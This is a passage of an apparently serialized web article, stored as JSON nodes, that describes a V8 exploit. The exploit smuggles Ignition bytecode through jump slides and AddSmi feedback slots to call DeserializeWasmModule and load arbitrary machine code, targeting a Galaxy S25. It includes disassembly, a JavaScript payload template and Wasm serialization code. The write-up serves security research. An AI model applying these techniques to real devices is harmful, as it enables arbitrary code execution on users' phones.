a209",{"type":28,"tag":116,"props":132337,"children":132338},{"style":370},[132339],{"type":33,"value":2226},{"type":28,"tag":116,"props":132341,"children":132342},{"style":350},[132343],{"type":33,"value":132271},{"type":28,"tag":116,"props":132345,"children":132346},{"style":266},[132347],{"type":33,"value":384},{"type":28,"tag":116,"props":132349,"children":132350},{"class":245,"line":387},[132351,132355,132360,132364,132368],{"type":28,"tag":116,"props":132352,"children":132353},{"style":376},[132354],{"type":33,"value":11455},{"type":28,"tag":116,"props":132356,"children":132357},{"style":272},[132358],{"type":33,"value":132359}," a210",{"type":28,"tag":116,"props":132361,"children":132362},{"style":370},[132363],{"type":33,"value":2226},{"type":28,"tag":116,"props":132365,"children":132366},{"style":350},[132367],{"type":33,"value":132271},{"type":28,"tag":116,"props":132369,"children":132370},{"style":266},[132371],{"type":33,"value":384},{"type":28,"tag":116,"props":132373,"children":132374},{"class":245,"line":400},[132375,132379,132384,132388,132392],{"type":28,"tag":116,"props":132376,"children":132377},{"style":376},[132378],{"type":33,"value":11455},{"type":28,"tag":116,"props":132380,"children":132381},{"style":272},[132382],{"type":33,"value":132383}," a211",{"type":28,"tag":116,"props":132385,"children":132386},{"style":370},[132387],{"type":33,"value":2226},{"type":28,"tag":116,"props":132389,"children":132390},{"style":350},[132391],{"type":33,"value":132271},{"type":28,"tag":116,"props":132393,"children":132394},{"style":266},[132395],{"type":33,"value":384},{"type":28,"tag":116,"props":132397,"children":132398},{"class":245,"line":614},[132399,132403,132408,132412,132416],{"type":28,"tag":116,"props":132400,"children":132401},{"style":376},[132402],{"type":33,"value":11455},{"type":28,"tag":116,"props":132404,"children":132405},{"style":272},[132406],{"type":33,"value":132407}," a212",{"type":28,"tag":116,"props":132409,"children":132410},{"style":370},[132411],{"type":33,"value":2226},{"type":28,"tag":116,"props":132413,"children":132414},{"style":350},[132415],{"type":33,"value":132271},{"type":28,"tag":116,"props":132417,"children":132418},{"style":266},[132419],{"type":33,"value":384},{"type":28,"tag":29,"props":132421,"children":132422},{},[132423],{"type":33,"value":132424},"Those instructions result in:",{"type":28,"tag":234,"props":132426,"children":132428},{"code":132427},"00: LdaTrue;\n01: LdaTrue;\n02: Jump +8;  >------------+\n04: Star rX + LdaSmi ...   |\nv--------------------------+\n0a: LdaTrue;\n0b: LdaTrue;\n",[132429],{"type":28,"tag":98,"props":132430,"children":132431},{"__ignoreMap":7},[132432],{"type":33,"value":132427},{"type":28,"tag":29,"props":132434,"children":132435},{},[132436,132438,132444,132446,132450],{"type":33,"value":132437},"(The offset of ",{"type":28,"tag":98,"props":132439,"children":132441},{"className":132440},[],[132442],{"type":33,"value":132443},"Jump",{"type":33,"value":132445}," instructions is added to the ",{"type":28,"tag":2583,"props":132447,"children":132448},{},[132449],{"type":33,"value":70709},{"type":33,"value":132451}," of the instruction.)",{"type":28,"tag":29,"props":132453,"children":132454},{},[132455,132457,132463],{"type":33,"value":132456},"Now, 3 out of the 6 bytes in a ",{"type":28,"tag":98,"props":132458,"children":132460},{"className":132459},[],[132461],{"type":33,"value":132462},"LdaSmi.ExtraWide",{"type":33,"value":132464}," instruction are valid for merging into the smuggled arbitrary Ignition bytecode. This slide made exploit development a lot easier, as any additional code would cause the exception table to have new offsets.",{"type":28,"tag":75,"props":132466,"children":132468},{"id":132467},"exploit-goal",[132469],{"type":33,"value":132470},"Exploit Goal",{"type":28,"tag":29,"props":132472,"children":132473},{},[132474,132476,132482,132483,132489],{"type":33,"value":132475},"Initially we considered using ",{"type":28,"tag":98,"props":132477,"children":132479},{"className":132478},[],[132480],{"type":33,"value":132481},"Star",{"type":33,"value":4250},{"type":28,"tag":98,"props":132484,"children":132486},{"className":132485},[],[132487],{"type":33,"value":132488},"Ldar",{"type":33,"value":132490}," instructions to store to out-of-bounds register indexes, as registers are stored on the regular stack. However, with only 2 bytes we can only access +/- 0x7f registers, which does not allow us to go out of bounds enough to access interesting values.",{"type":28,"tag":29,"props":132492,"children":132493},{},[132494,132496,132503],{"type":33,"value":132495},"We realized that register offsets 0 and 1 contain the saved frame pointer and return address respectively. We considered using this to ",{"type":28,"tag":87,"props":132497,"children":132500},{"href":132498,"rel":132499},"https://github.com/google/google-ctf/tree/main/2023/quals/sandbox-v8box/solution",[91],[132501],{"type":33,"value":132502},"stack pivot and ROP",{"type":33,"value":132504},". However, there were numerous downsides - primarily, we would need multiple leaks of binary addresses and the JS heap (to construct a buffer with a fake stack frame).",{"type":28,"tag":29,"props":132506,"children":132507},{},[132508],{"type":33,"value":132509},"Additionally, the interpreter expects all values to be tagged V8 values (i.e. 32-bit compressed pointers or Smis). This means that operating on 64-bit addresses can cause surprising truncations or 'untagging' extensions.",{"type":28,"tag":29,"props":132511,"children":132512},{},[132513],{"type":33,"value":132514},"Finally, ROP/stack pivoting-based approaches would cause significant work when porting from our x86_64 development machines to the aarch64 target device, and might not even be feasible given the existence of PAC and BTI on the Galaxy S25.",{"type":28,"tag":29,"props":132516,"children":132517},{},[132518,132520,132526,132528,132534,132536,132542],{"type":33,"value":132519},"At this point, we identified an interesting opcode: ",{"type":28,"tag":98,"props":132521,"children":132523},{"className":132522},[],[132524],{"type":33,"value":132525},"CallRuntime",{"type":33,"value":132527},". Runtime functions are used to implement a lot of core V8 functionality, and are native functions exposed to bytecode (but not to the user, unless ",{"type":28,"tag":98,"props":132529,"children":132531},{"className":132530},[],[132532],{"type":33,"value":132533},"--allow-natives-syntax",{"type":33,"value":132535}," is enabled). Many of these allow powerful functionality as inputs are assumed to be trusted, but one stands out: ",{"type":28,"tag":98,"props":132537,"children":132539},{"className":132538},[],[132540],{"type":33,"value":132541},"DeserializeWasmModule",{"type":33,"value":141},{"type":28,"tag":29,"props":132544,"children":132545},{},[132546,132548,132555,132556,132561,132562,132568,132570,132577],{"type":33,"value":132547},"WebAssembly modules may be internally serialized and deserialized by the runtime - this serialization format includes raw machine code for any ",{"type":28,"tag":87,"props":132549,"children":132552},{"href":132550,"rel":132551},"https://gist.github.com/Riatre/83d5fdb970946c8e185c5e1b2b842b1b",[91],[132553],{"type":33,"value":132554},"JIT-compiled functions",{"type":33,"value":18195},{"type":28,"tag":98,"props":132557,"children":132559},{"className":132558},[],[132560],{"type":33,"value":132541},{"type":33,"value":4250},{"type":28,"tag":98,"props":132563,"children":132565},{"className":132564},[],[132566],{"type":33,"value":132567},"SerializeWasmModule",{"type":33,"value":132569}," themselves are only used from test functions, and indeed have been ",{"type":28,"tag":87,"props":132571,"children":132574},{"href":132572,"rel":132573},"https://chromium-review.googlesource.com/c/v8/v8/+/6875821",[91],[132575],{"type":33,"value":132576},"removed",{"type":33,"value":132578}," from recent production V8 builds due to how abusable this functionality is.",{"type":28,"tag":29,"props":132580,"children":132581},{},[132582,132584,132590,132592,132598,132600,132605,132607,132613,132615,132620,132621,132626,132627,132632,132634,132640,132642,132646],{"type":33,"value":132583},"However, calling this opcode represented a significant challenge:\n",{"type":28,"tag":98,"props":132585,"children":132587},{"className":132586},[],[132588],{"type":33,"value":132589},"CallRuntime \u003Cfunc-id> \u003Cargs> \u003Cargc>",{"type":33,"value":132591},"\nWhere ",{"type":28,"tag":98,"props":132593,"children":132595},{"className":132594},[],[132596],{"type":33,"value":132597},"func-id",{"type":33,"value":132599}," is a 2-byte function ID, ",{"type":28,"tag":98,"props":132601,"children":132603},{"className":132602},[],[132604],{"type":33,"value":37850},{"type":33,"value":132606}," is the index of the last register passed and ",{"type":28,"tag":98,"props":132608,"children":132610},{"className":132609},[],[132611],{"type":33,"value":132612},"argc",{"type":33,"value":132614}," is the number of arguments passed (e.g. passing ",{"type":28,"tag":98,"props":132616,"children":132618},{"className":132617},[],[132619],{"type":33,"value":44005},{"type":33,"value":825},{"type":28,"tag":98,"props":132622,"children":132624},{"className":132623},[],[132625],{"type":33,"value":44148},{"type":33,"value":10659},{"type":28,"tag":98,"props":132628,"children":132630},{"className":132629},[],[132631],{"type":33,"value":44131},{"type":33,"value":132633}," would be encoded as ",{"type":28,"tag":98,"props":132635,"children":132637},{"className":132636},[],[132638],{"type":33,"value":132639},"\u003Cr2> \u003C3>",{"type":33,"value":132641},").\nThis requires ",{"type":28,"tag":2583,"props":132643,"children":132644},{},[132645],{"type":33,"value":17771},{"type":33,"value":132647}," bytes of control - additionally, we must then store the accumulator safely into a register, then return the value back to JS code.",{"type":28,"tag":75,"props":132649,"children":132651},{"id":132650},"better-bytecode-control",[132652],{"type":33,"value":132653},"Better Bytecode Control",{"type":28,"tag":29,"props":132655,"children":132656},{},[132657,132659,132666,132668,132674],{"type":33,"value":132658},"Luckily, arithmetic instructions in Ignition have a feature known as the '",{"type":28,"tag":87,"props":132660,"children":132663},{"href":132661,"rel":132662},"https://benediktmeurer.de/2017/12/13/an-introduction-to-speculative-optimization-in-v8/",[91],[132664],{"type":33,"value":132665},"feedback vector slot",{"type":33,"value":132667},"', where it stores profiling information for subsequent optimizations by Turbofan. Observationally, for the ",{"type":28,"tag":98,"props":132669,"children":132671},{"className":132670},[],[132672],{"type":33,"value":132673},"AddSmi",{"type":33,"value":132675}," instruction, it represents the number of operations performed on the target value so far.",{"type":28,"tag":29,"props":132677,"children":132678},{},[132679],{"type":33,"value":132680},"For example, we can look at the below Ignition disassembly:",{"type":28,"tag":234,"props":132682,"children":132684},{"code":132683},"2000 : 01 0d 11 11 93 0e LdaSmi.ExtraWide [244519185]\n2006 : cd                Star1\n2007 : 00 1b ff ff 1d ff Mov.Wide \u003Ccontext>, r220\n2013 : 0b f8             Ldar r1\n2015 : 01 4b 11 11 93 0a 01 00 00 00 AddSmi.ExtraWide [177410321], [1]\n2025 : 0b f8             Ldar r1\n2027 : 01 4b 11 11 93 0a 02 00 00 00 AddSmi.ExtraWide [177410321], [2]\n2037 : 0b f8             Ldar r1\n2039 : 01 4b 11 11 93 0a 03 00 00 00 AddSmi.ExtraWide [177410321], [3]\n2049 : 0b f8             Ldar r1\n2051 : 01 4b 11 11 93 0a 04 00 00 00 AddSmi.ExtraWide [177410321], [4]\n2061 : 0b f8             Ldar r1\n2063 : 01 4b 11 11 93 0a 05 00 00 00 AddSmi.ExtraWide [177410321], [5]\n",[132685],{"type":28,"tag":98,"props":132686,"children":132687},{"__ignoreMap":7},[132688],{"type":33,"value":132683},{"type":28,"tag":29,"props":132690,"children":132691},{},[132692,132694,132700],{"type":33,"value":132693},"We can see the feedback vector slot increments for every operation. This means that with a smuggled jump slide through ",{"type":28,"tag":98,"props":132695,"children":132697},{"className":132696},[],[132698],{"type":33,"value":132699},"AddSmi.ExtraWide",{"type":33,"value":132701},", we can control almost 8 bytes (because of the SMI constraint) given enough addition instructions.",{"type":28,"tag":29,"props":132703,"children":132704},{},[132705],{"type":33,"value":132706},"Eventually, we can reach a stage like this:",{"type":28,"tag":234,"props":132708,"children":132710},{"code":132709},"4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]\n",[132711],{"type":28,"tag":98,"props":132712,"children":132713},{"__ignoreMap":7},[132714],{"type":33,"value":132709},{"type":28,"tag":29,"props":132716,"children":132717},{},[132718],{"type":33,"value":132719},"If you skip the first two bytes, you have",{"type":28,"tag":2108,"props":132721,"children":132722},{},[132723,132754],{"type":28,"tag":459,"props":132724,"children":132725},{},[132726,132731,132733,132738,132740,132746,132748],{"type":28,"tag":98,"props":132727,"children":132729},{"className":132728},[],[132730],{"type":33,"value":132525},{"type":33,"value":132732}," (0x6c) to ",{"type":28,"tag":98,"props":132734,"children":132736},{"className":132735},[],[132737],{"type":33,"value":132541},{"type":33,"value":132739}," (0x0266) starting from register ",{"type":28,"tag":98,"props":132741,"children":132743},{"className":132742},[],[132744],{"type":33,"value":132745},"a2",{"type":33,"value":132747}," (0x4) with 2 arguments (0x2). This becomes the call: ",{"type":28,"tag":98,"props":132749,"children":132751},{"className":132750},[],[132752],{"type":33,"value":132753},"DeserializeWasmModule(a2, a1)",{"type":28,"tag":459,"props":132755,"children":132756},{},[132757],{"type":33,"value":132758},"a Jump instruction",{"type":28,"tag":75,"props":132760,"children":132762},{"id":132761},"returning-back-to-js",[132763],{"type":33,"value":132764},"Returning Back to JS",{"type":28,"tag":29,"props":132766,"children":132767},{},[132768,132770,132776],{"type":33,"value":132769},"After that call, the result is stored in the accumulator. Since this function is an async generator, we have to ",{"type":28,"tag":98,"props":132771,"children":132773},{"className":132772},[],[132774],{"type":33,"value":132775},"yield",{"type":33,"value":132777}," the result, but that results in a long series of instructions that we can't possibly smuggle.",{"type":28,"tag":29,"props":132779,"children":132780},{},[132781],{"type":33,"value":132782},"The solution here is simple: we use the smuggled control flow to merge back into the normal control flow, that leads us into a yield from the original JS. For example, in our exploit, all the additions were done in a try block:",{"type":28,"tag":234,"props":132784,"children":132786},{"code":132785,"language":31017,"meta":7,"className":31015,"style":7},"try {\n  ${'a1 + 0xa931111;'.repeat(0x059302 - 1)}\n  a1 + 0x0402666c;\n  throw 0x393e91a;\n} catch (e) {\n  console.log(\"foo\");\n  yield a16;\n}\n",[132787],{"type":28,"tag":98,"props":132788,"children":132789},{"__ignoreMap":7},[132790,132801,132849,132870,132886,132909,132937,132954],{"type":28,"tag":116,"props":132791,"children":132792},{"class":245,"line":246},[132793,132797],{"type":28,"tag":116,"props":132794,"children":132795},{"style":260},[132796],{"type":33,"value":47955},{"type":28,"tag":116,"props":132798,"children":132799},{"style":266},[132800],{"type":33,"value":1291},{"type":28,"tag":116,"props":132802,"children":132803},{"class":245,"line":256},[132804,132809,132813,132818,132822,132827,132831,132836,132840,132844],{"type":28,"tag":116,"props":132805,"children":132806},{"style":272},[132807],{"type":33,"value":132808},"  $",{"type":28,"tag":116,"props":132810,"children":132811},{"style":266},[132812],{"type":33,"value":76238},{"type":28,"tag":116,"props":132814,"children":132815},{"style":563},[132816],{"type":33,"value":132817},"'a1 + 0xa931111;'",{"type":28,"tag":116,"props":132819,"children":132820},{"style":266},[132821],{"type":33,"value":141},{"type":28,"tag":116,"props":132823,"children":132824},{"style":282},[132825],{"type":33,"value":132826},"repeat",{"type":28,"tag":116,"props":132828,"children":132829},{"style":266},[132830],{"type":33,"value":313},{"type":28,"tag":116,"props":132832,"children":132833},{"style":350},[132834],{"type":33,"value":132835},"0x059302",{"type":28,"tag":116,"props":132837,"children":132838},{"style":370},[132839],{"type":33,"value":50874},{"type":28,"tag":116,"props":132841,"children":132842},{"style":350},[132843],{"type":33,"value":4192},{"type":28,"tag":116,"props":132845,"children":132846},{"style":266},[132847],{"type":33,"value":132848},")}\n",{"type":28,"tag":116,"props":132850,"children":132851},{"class":245,"line":293},[132852,132857,132861,132866],{"type":28,"tag":116,"props":132853,"children":132854},{"style":272},[132855],{"type":33,"value":132856},"  a1",{"type":28,"tag":116,"props":132858,"children":132859},{"style":370},[132860],{"type":33,"value":2258},{"type":28,"tag":116,"props":132862,"children":132863},{"style":350},[132864],{"type":33,"value":132865}," 0x0402666c",{"type":28,"tag":116,"props":132867,"children":132868},{"style":266},[132869],{"type":33,"value":384},{"type":28,"tag":116,"props":132871,"children":132872},{"class":245,"line":361},[132873,132877,132882],{"type":28,"tag":116,"props":132874,"children":132875},{"style":260},[132876],{"type":33,"value":34828},{"type":28,"tag":116,"props":132878,"children":132879},{"style":350},[132880],{"type":33,"value":132881}," 0x393e91a",{"type":28,"tag":116,"props":132883,"children":132884},{"style":266},[132885],{"type":33,"value":384},{"type":28,"tag":116,"props":132887,"children":132888},{"class":245,"line":387},[132889,132893,132897,132901,132905],{"type":28,"tag":116,"props":132890,"children":132891},{"style":266},[132892],{"type":33,"value":46499},{"type":28,"tag":116,"props":132894,"children":132895},{"style":260},[132896],{"type":33,"value":48033},{"type":28,"tag":116,"props":132898,"children":132899},{"style":266},[132900],{"type":33,"value":269},{"type":28,"tag":116,"props":132902,"children":132903},{"style":272},[132904],{"type":33,"value":1413},{"type":28,"tag":116,"props":132906,"children":132907},{"style":266},[132908],{"type":33,"value":844},{"type":28,"tag":116,"props":132910,"children":132911},{"class":245,"line":400},[132912,132916,132920,132924,132928,132933],{"type":28,"tag":116,"props":132913,"children":132914},{"style":272},[132915],{"type":33,"value":101558},{"type":28,"tag":116,"props":132917,"children":132918},{"style":266},[132919],{"type":33,"value":141},{"type":28,"tag":116,"props":132921,"children":132922},{"style":282},[132923],{"type":33,"value":101567},{"type":28,"tag":116,"props":132925,"children":132926},{"style":266},[132927],{"type":33,"value":313},{"type":28,"tag":116,"props":132929,"children":132930},{"style":563},[132931],{"type":33,"value":132932},"\"foo\"",{"type":28,"tag":116,"props":132934,"children":132935},{"style":266},[132936],{"type":33,"value":895},{"type":28,"tag":116,"props":132938,"children":132939},{"class":245,"line":614},[132940,132945,132950],{"type":28,"tag":116,"props":132941,"children":132942},{"style":260},[132943],{"type":33,"value":132944},"  yield",{"type":28,"tag":116,"props":132946,"children":132947},{"style":272},[132948],{"type":33,"value":132949}," a16",{"type":28,"tag":116,"props":132951,"children":132952},{"style":266},[132953],{"type":33,"value":384},{"type":28,"tag":116,"props":132955,"children":132956},{"class":245,"line":631},[132957],{"type":28,"tag":116,"props":132958,"children":132959},{"style":266},[132960],{"type":33,"value":406},{"type":28,"tag":29,"props":132962,"children":132963},{},[132964,132966],{"type":33,"value":132965},"Starting from the final ",{"type":28,"tag":98,"props":132967,"children":132969},{"className":132968},[],[132970],{"type":33,"value":132673},{"type":28,"tag":234,"props":132972,"children":132974},{"code":132973}," 4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]\n 4385784 : 01 0d 1a e9 93 03 LdaSmi.ExtraWide [60025114]\n 4385790 : b1                Throw\n 4385791 : 00 1a 1a ff       Star.Wide r223\n",[132975],{"type":28,"tag":98,"props":132976,"children":132977},{"__ignoreMap":7},[132978],{"type":33,"value":132973},{"type":28,"tag":29,"props":132980,"children":132981},{},[132982,132984,132989,132991,132997],{"type":33,"value":132983},"The smuggled jump in ",{"type":28,"tag":98,"props":132985,"children":132987},{"className":132986},[],[132988],{"type":33,"value":132673},{"type":33,"value":132990}," will redirect us to ",{"type":28,"tag":98,"props":132992,"children":132994},{"className":132993},[],[132995],{"type":33,"value":132996},"1a e9 93 03",{"type":33,"value":132998},", which results in:",{"type":28,"tag":2108,"props":133000,"children":133001},{},[133002,133013],{"type":28,"tag":459,"props":133003,"children":133004},{},[133005,133011],{"type":28,"tag":98,"props":133006,"children":133008},{"className":133007},[],[133009],{"type":33,"value":133010},"Star r16",{"type":33,"value":133012}," (store accumulator to r16)",{"type":28,"tag":459,"props":133014,"children":133015},{},[133016,133021],{"type":28,"tag":98,"props":133017,"children":133019},{"className":133018},[],[133020],{"type":33,"value":132443},{"type":33,"value":133022}," past the throw into the catch relevant code",{"type":28,"tag":29,"props":133024,"children":133025},{},[133026,133028,133034],{"type":33,"value":133027},"This will bring us nicely to the final ",{"type":28,"tag":98,"props":133029,"children":133031},{"className":133030},[],[133032],{"type":33,"value":133033},"yield a16",{"type":33,"value":133035},", and we now have a Deserialized Wasm Module with our own arbitrary machine code.",{"type":28,"tag":75,"props":133037,"children":133039},{"id":133038},"executing-shellcode",[133040],{"type":33,"value":133041},"Executing Shellcode",{"type":28,"tag":29,"props":133043,"children":133044},{},[133045],{"type":33,"value":133046},"To test this, we first serialize a small WebAssembly module and print the resulting Uint8Array:",{"type":28,"tag":234,"props":133048,"children":133050},{"code":133049,"language":35241,"meta":7,"className":35239,"style":7},"var wasm_code = new Uint8Array([\n  0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n  0, 0, 10, 4, 1, 2, 0, 11,\n]);\nvar mod = new WebAssembly.Module(wasm_code);\nvar inst = new WebAssembly.Instance(mod);\nvar func = inst.exports.shell;\n\n%WasmTierUpFunction(func);\nvar serialized = %SerializeWasmModule(mod);\nlet result = new Uint8Array(serialized);\nconsole.log('[' + result.join(', ') + ']');\n",[133051],{"type":28,"tag":98,"props":133052,"children":133053},{"__ignoreMap":7},[133054,133084,133311,133379,133386,133431,133477,133517,133524,133548,133585,133621],{"type":28,"tag":116,"props":133055,"children":133056},{"class":245,"line":246},[133057,133061,133066,133070,133074,133079],{"type":28,"tag":116,"props":133058,"children":133059},{"style":376},[133060],{"type":33,"value":34674},{"type":28,"tag":116,"props":133062,"children":133063},{"style":272},[133064],{"type":33,"value":133065}," wasm_code",{"type":28,"tag":116,"props":133067,"children":133068},{"style":370},[133069],{"type":33,"value":2226},{"type":28,"tag":116,"props":133071,"children":133072},{"style":376},[133073],{"type":33,"value":31582},{"type":28,"tag":116,"props":133075,"children":133076},{"style":282},[133077],{"type":33,"value":133078}," Uint8Array",{"type":28,"tag":116,"props":133080,"children":133081},{"style":266},[133082],{"type":33,"value":133083},"([\n",{"type":28,"tag":116,"props":133085,"children":133086},{"class":245,"line":256},[133087,133092,133096,133101,133105,133110,133114,133119,133123,133127,133131,133135,133139,133143,133147,133151,133155,133159,133163,133167,133171,133175,133179,133184,133188,133192,133196,133200,133204,133208,133212,133216,133220,133224,133228,133232,133236,133240,133244,133248,133252,133256,133260,133264,133268,133272,133276,133281,133285,133290,133294,133299,133303,133307],{"type":28,"tag":116,"props":133088,"children":133089},{"style":350},[133090],{"type":33,"value":133091},"  0",{"type":28,"tag":116,"props":133093,"children":133094},{"style":266},[133095],{"type":33,"value":825},{"type":28,"tag":116,"props":133097,"children":133098},{"style":350},[133099],{"type":33,"value":133100},"97",{"type":28,"tag":116,"props":133102,"children":133103},{"style":266},[133104],{"type":33,"value":825},{"type":28,"tag":116,"props":133106,"children":133107},{"style":350},[133108],{"type":33,"value":133109},"115",{"type":28,"tag":116,"props":133111,"children":133112},{"style":266},[133113],{"type":33,"value":825},{"type":28,"tag":116,"props":133115,"children":133116},{"style":350},[133117],{"type":33,"value":133118},"109",{"type":28,"tag":116,"props":133120,"children":133121},{"style":266},[133122],{"type":33,"value":825},{"type":28,"tag":116,"props":133124,"children":133125},{"style":350},[133126],{"type":33,"value":1824},{"type":28,"tag":116,"props":133128,"children":133129},{"style":266},[133130],{"type":33,"value":825},{"type":28,"tag":116,"props":133132,"children":133133},{"style":350},[133134],{"type":33,"value":353},{"type":28,"tag":116,"props":133136,"children":133137},{"style":266},[133138],{"type":33,"value":825},{"type":28,"tag":116,"props":133140,"children":133141},{"style":350},[133142],{"type":33,"value":353},{"type":28,"tag":116,"props":133144,"children":133145},{"style":266},[133146],{"type":33,"value":825},{"type":28,"tag":116,"props":133148,"children":133149},{"style":350},[133150],{"type":33,"value":353},{"type":28,"tag":116,"props":133152,"children":133153},{"style":266},[133154],{"type":33,"value":825},{"type":28,"tag":116,"props":133156,"children":133157},{"style":350},[133158],{"type":33,"value":1824},{"type":28,"tag":116,"props":133160,"children":133161},{"style":266},[133162],{"type":33,"value":825},{"type":28,"tag":116,"props":133164,"children":133165},{"style":350},[133166],{"type":33,"value":17190},{"type":28,"tag":116,"props":133168,"children":133169},{"style":266},[133170],{"type":33,"value":825},{"type":28,"tag":116,"props":133172,"children":133173},{"style":350},[133174],{"type":33,"value":1824},{"type":28,"tag":116,"props":133176,"children":133177},{"style":266},[133178],{"type":33,"value":825},{"type":28,"tag":116,"props":133180,"children":133181},{"style":350},[133182],{"type":33,"value":133183},"96",{"type":28,"tag":116,"props":133185,"children":133186},{"style":266},[133187],{"type":33,"value":825},{"type":28,"tag":116,"props":133189,"children":133190},{"style":350},[133191],{"type":33,"value":353},{"type":28,"tag":116,"props":133193,"children":133194},{"style":266},[133195],{"type":33,"value":825},{"type":28,"tag":116,"props":133197,"children":133198},{"style":350},[133199],{"type":33,"value":353},{"type":28,"tag":116,"props":133201,"children":133202},{"style":266},[133203],{"type":33,"value":825},{"type":28,"tag":116,"props":133205,"children":133206},{"style":350},[133207],{"type":33,"value":16957},{"type":28,"tag":116,"props":133209,"children":133210},{"style":266},[133211],{"type":33,"value":825},{"type":28,"tag":116,"props":133213,"children":133214},{"style":350},[133215],{"type":33,"value":2794},{"type":28,"tag":116,"props":133217,"children":133218},{"style":266},[133219],{"type":33,"value":825},{"type":28,"tag":116,"props":133221,"children":133222},{"style":350},[133223],{"type":33,"value":1824},{"type":28,"tag":116,"props":133225,"children":133226},{"style":266},[133227],{"type":33,"value":825},{"type":28,"tag":116,"props":133229,"children":133230},{"style":350},[133231],{"type":33,"value":353},{"type":28,"tag":116,"props":133233,"children":133234},{"style":266},[133235],{"type":33,"value":825},{"type":28,"tag":116,"props":133237,"children":133238},{"style":350},[133239],{"type":33,"value":54289},{"type":28,"tag":116,"props":133241,"children":133242},{"style":266},[133243],{"type":33,"value":825},{"type":28,"tag":116,"props":133245,"children":133246},{"style":350},[133247],{"type":33,"value":55504},{"type":28,"tag":116,"props":133249,"children":133250},{"style":266},[133251],{"type":33,"value":825},{"type":28,"tag":116,"props":133253,"children":133254},{"style":350},[133255],{"type":33,"value":1824},{"type":28,"tag":116,"props":133257,"children":133258},{"style":266},[133259],{"type":33,"value":825},{"type":28,"tag":116,"props":133261,"children":133262},{"style":350},[133263],{"type":33,"value":17771},{"type":28,"tag":116,"props":133265,"children":133266},{"style":266},[133267],{"type":33,"value":825},{"type":28,"tag":116,"props":133269,"children":133270},{"style":350},[133271],{"type":33,"value":133109},{"type":28,"tag":116,"props":133273,"children":133274},{"style":266},[133275],{"type":33,"value":825},{"type":28,"tag":116,"props":133277,"children":133278},{"style":350},[133279],{"type":33,"value":133280},"104",{"type":28,"tag":116,"props":133282,"children":133283},{"style":266},[133284],{"type":33,"value":825},{"type":28,"tag":116,"props":133286,"children":133287},{"style":350},[133288],{"type":33,"value":133289},"101",{"type":28,"tag":116,"props":133291,"children":133292},{"style":266},[133293],{"type":33,"value":825},{"type":28,"tag":116,"props":133295,"children":133296},{"style":350},[133297],{"type":33,"value":133298},"108",{"type":28,"tag":116,"props":133300,"children":133301},{"style":266},[133302],{"type":33,"value":825},{"type":28,"tag":116,"props":133304,"children":133305},{"style":350},[133306],{"type":33,"value":133298},{"type":28,"tag":116,"props":133308,"children":133309},{"style":266},[133310],{"type":33,"value":3178},{"type":28,"tag":116,"props":133312,"children":133313},{"class":245,"line":293},[133314,133318,133322,133326,133330,133334,133338,133342,133346,133350,133354,133358,133362,133366,133370,133375],{"type":28,"tag":116,"props":133315,"children":133316},{"style":350},[133317],{"type":33,"value":133091},{"type":28,"tag":116,"props":133319,"children":133320},{"style":266},[133321],{"type":33,"value":825},{"type":28,"tag":116,"props":133323,"children":133324},{"style":350},[133325],{"type":33,"value":353},{"type":28,"tag":116,"props":133327,"children":133328},{"style":266},[133329],{"type":33,"value":825},{"type":28,"tag":116,"props":133331,"children":133332},{"style":350},[133333],{"type":33,"value":88871},{"type":28,"tag":116,"props":133335,"children":133336},{"style":266},[133337],{"type":33,"value":825},{"type":28,"tag":116,"props":133339,"children":133340},{"style":350},[133341],{"type":33,"value":17190},{"type":28,"tag":116,"props":133343,"children":133344},{"style":266},[133345],{"type":33,"value":825},{"type":28,"tag":116,"props":133347,"children":133348},{"style":350},[133349],{"type":33,"value":1824},{"type":28,"tag":116,"props":133351,"children":133352},{"style":266},[133353],{"type":33,"value":825},{"type":28,"tag":116,"props":133355,"children":133356},{"style":350},[133357],{"type":33,"value":2794},{"type":28,"tag":116,"props":133359,"children":133360},{"style":266},[133361],{"type":33,"value":825},{"type":28,"tag":116,"props":133363,"children":133364},{"style":350},[133365],{"type":33,"value":353},{"type":28,"tag":116,"props":133367,"children":133368},{"style":266},[133369],{"type":33,"value":825},{"type":28,"tag":116,"props":133371,"children":133372},{"style":350},[133373],{"type":33,"value":133374},"11",{"type":28,"tag":116,"props":133376,"children":133377},{"style":266},[133378],{"type":33,"value":3178},{"type":28,"tag":116,"props":133380,"children":133381},{"class":245,"line":361},[133382],{"type":28,"tag":116,"props":133383,"children":133384},{"style":266},[133385],{"type":33,"value":3422},{"type":28,"tag":116,"props":133387,"children":133388},{"class":245,"line":387},[133389,133393,133397,133401,133405,133410,133414,133418,133422,133427],{"type":28,"tag":116,"props":133390,"children":133391},{"style":376},[133392],{"type":33,"value":34674},{"type":28,"tag":116,"props":133394,"children":133395},{"style":272},[133396],{"type":33,"value":71242},{"type":28,"tag":116,"props":133398,"children":133399},{"style":370},[133400],{"type":33,"value":2226},{"type":28,"tag":116,"props":133402,"children":133403},{"style":376},[133404],{"type":33,"value":31582},{"type":28,"tag":116,"props":133406,"children":133407},{"style":272},[133408],{"type":33,"value":133409}," WebAssembly",{"type":28,"tag":116,"props":133411,"children":133412},{"style":266},[133413],{"type":33,"value":141},{"type":28,"tag":116,"props":133415,"children":133416},{"style":282},[133417],{"type":33,"value":85537},{"type":28,"tag":116,"props":133419,"children":133420},{"style":266},[133421],{"type":33,"value":313},{"type":28,"tag":116,"props":133423,"children":133424},{"style":272},[133425],{"type":33,"value":133426},"wasm_code",{"type":28,"tag":116,"props":133428,"children":133429},{"style":266},[133430],{"type":33,"value":895},{"type":28,"tag":116,"props":133432,"children":133433},{"class":245,"line":400},[133434,133438,133443,133447,133451,133455,133459,133464,133468,133473],{"type":28,"tag":116,"props":133435,"children":133436},{"style":376},[133437],{"type":33,"value":34674},{"type":28,"tag":116,"props":133439,"children":133440},{"style":272},[133441],{"type":33,"value":133442}," 